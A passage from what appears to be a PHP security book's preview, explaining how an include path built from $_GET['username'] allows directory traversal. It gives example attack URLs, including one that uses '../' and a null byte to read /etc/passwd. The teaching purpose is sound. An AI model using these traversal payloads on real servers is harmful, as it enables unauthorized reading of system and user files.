To make the vulnerability more obvious, this example uses $_GET. The same vulnerability exists when any tainted data is used—using $_GET['username'] is an extreme example used for clarity.
While this approach has merit, it also provides an attacker with the perfect opportunity to choose which cached file is displayed. For example, a user can easily view another user's cached file by modifying the value of username in the URL. In fact, an attacker can display any .html file stored within /cache simply by using the name of the file (without the extension) as the value of username:
    http://example.org/index.php?username=filename
Although an attacker is bound by the static portions of the path and filename, manipulating the filename isn't the only concern. A creative attacker can traverse the filesystem, looking for other .html files located elsewhere, hoping to find ones that contain sensitive data. Because .. indicates the parent directory, this string can be used for the traversal:
    http://example.org/index.php?username=../admin/users
This results in the following:
    <?php

    include "/cache/../admin/users.html";

    ?>
In this case, .. refers to the parent directory of /cache, which is the root directory. This is effectively the same as the following:
    <?php

    include "/admin/users.html";

    ?>
Because every file on the filesystem is within the root directory, this approach allows an attacker to access any .html resource on your server.
On some platforms, an attacker can supply NULL in the URL to terminate the string. For example:
http://example.org/index.php?username=../etc/passwd%00
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Code Injection
Content preview·Buy PDF of this chapter|